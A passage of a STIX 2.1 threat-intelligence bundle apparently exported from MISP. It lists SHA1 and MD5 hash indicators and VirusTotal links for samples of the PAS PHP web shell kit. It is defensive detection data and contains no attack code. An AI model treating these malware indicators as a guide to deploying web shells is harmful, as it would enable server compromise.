"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:55.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:55.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:55Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:55Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab53-47cc-41f0-b7e5-4c5102de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19/analysis/1480711757/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab53-cfd4-4844-a83c-4da102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:55.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:55.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'a6c6027eabde338021a59d37008874f8139d519e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:55Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab54-f570-4e06-9e43-45dd02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:56.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:56.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'f189fdf925c710e9e110ae09b91afbc3']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:56Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab54-f590-4254-97dc-47bd02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:56.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:56.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:56Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:56Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab54-f590-4254-97dc-47bd02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab54-f590-4254-97dc-47bd02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/edd14d44423bfd37f213906fbd3057f793e71cad5b11832375c98a421621d1d0/analysis/1479994492/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab55-4468-4e85-be37-454c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:57.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:57.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'e8f80180622b001eeacc584a54a231346face5b5']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:57Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab56-85dc-46b2-8b29-4e4b02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:58.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:58.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086",
|
|
|
|
"pattern": "[file:hashes.MD5 = '91176827364ed0b81322f78c90eb2af3']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:58Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab56-44c4-4de0-8352-4a1f02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:58.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:58.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:58Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:58Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab56-44c4-4de0-8352-4a1f02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab56-44c4-4de0-8352-4a1f02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/324eafb0da0943d2f83be775bfb58646765712642a4ed1ece1a27eeec65ad086/analysis/1477380701/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab57-8950-4855-8d5e-46c002de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:59.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:59.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '98d37c2d0450e4715584970c281cb163002cbb8e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:59Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab58-6ec4-48e7-8cf6-4eb602de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:00.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:00.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1",
|
|
|
|
"pattern": "[file:hashes.MD5 = '6f19d3ccb1ba38b11794876b2be345b2']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:00Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab58-6044-4572-8efe-4fea02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:00.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:00.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:58:00Z",
|
|
|
|
"last_observed": "2016-12-31T12:58:00Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab58-6044-4572-8efe-4fea02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab58-6044-4572-8efe-4fea02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/b8313a966f93f773b031d386afe56792fe1edb0ffd1bc07a9ae72cec48e0d6f1/analysis/1481525510/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab59-2814-4089-a276-4a7102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:01.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:01.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '7597be3cae3680e89e14f7f7cc1138c6c0b482e1']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:01Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab5a-12f8-4159-b3bd-405602de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:02.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:02.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'bd7b3f08183cf531f09b47311dec69d7']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:02Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab5b-ff04-4404-8841-4d9c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:03.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:03.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:58:03Z",
|
|
|
|
"last_observed": "2016-12-31T12:58:03Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab5b-ff04-4404-8841-4d9c02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab5b-ff04-4404-8841-4d9c02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/1025f33ff026495d7f7fdb527e127e2b7780d9d28cb1e7912a9be84f38ba858e/analysis/1477902539/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab5b-1274-4245-b71a-46d502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:03.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:03.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'adf649354ff4d1812e7de745214362959e0174b1']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:03Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab5c-c818-4db9-84a5-4ce402de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:04.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:04.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'fc45abdd5fb3ffa4d3799737b3f597f4']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:04Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab5c-0194-421b-b029-41ac02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:04.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:04.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:58:04Z",
|
|
|
|
"last_observed": "2016-12-31T12:58:04Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab5c-0194-421b-b029-41ac02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab5c-0194-421b-b029-41ac02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/d285115e97c02063836f1cf8f91669c114052727c39bf4bd3c062ad5b3509e38/analysis/1483125351/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab5d-e71c-4547-ad36-4ef002de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:05.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:05.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '0de0be33ffbb98a60286be3bd19e02099d87a978']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:05Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab5e-dbdc-45e2-aa3e-4f9a02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:06.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:06.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775",
|
|
|
|
"pattern": "[file:hashes.MD5 = '5bced75b16bb0a00b7fd61bf03e5f602']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:06Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab5e-88ac-476b-89cc-4e2702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:06.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:06.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:58:06Z",
|
|
|
|
"last_observed": "2016-12-31T12:58:06Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab5e-88ac-476b-89cc-4e2702de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab5e-88ac-476b-89cc-4e2702de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/972866536f195079071d23b9f8ec90eb32ae3aa493d8cdf5ad34b85dec1a0775/analysis/1476900530/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab5f-5434-40c4-90b3-405c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:07.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:07.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'efcc0c18e10072b50deeca9592c76bc90f4d18ce']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:07Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab60-d440-410f-a9c4-4db102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:08.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:08.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'bfcb50cffca601b33c285b9f54b64cb1']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:08Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab60-be3c-4cdc-88aa-499c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:08.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:08.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:58:08Z",
|
|
|
|
"last_observed": "2016-12-31T12:58:08Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab60-be3c-4cdc-88aa-499c02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab60-be3c-4cdc-88aa-499c02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/da9f2804b16b369156e1b629ad3d2aac79326b94284e43c7b8355f3db71912b8/analysis/1483160795/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab61-03c0-4aa4-b522-4bb802de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:09.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:09.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'fd82bec721c32851806721b7ab25bbba3f957f49']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:09Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab62-6f68-4447-9007-4f3a02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:10.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:10.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 3367623638d42bdc1c45c44cb1843c00b510814170bc4e5da61eba2ddb212672",
|
|
|
|
"pattern": "[file:hashes.MD5 = '44a4173ce6928aa30acd276252bc1267']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:58:10Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab62-efd4-45e1-b6c2-44fd02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:58:10.000Z",
|
|
|
|
"modified": "2016-12-31T12:58:10.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:58:10Z",
|
|
|
|
"last_observed": "2016-12-31T12:58:10Z",
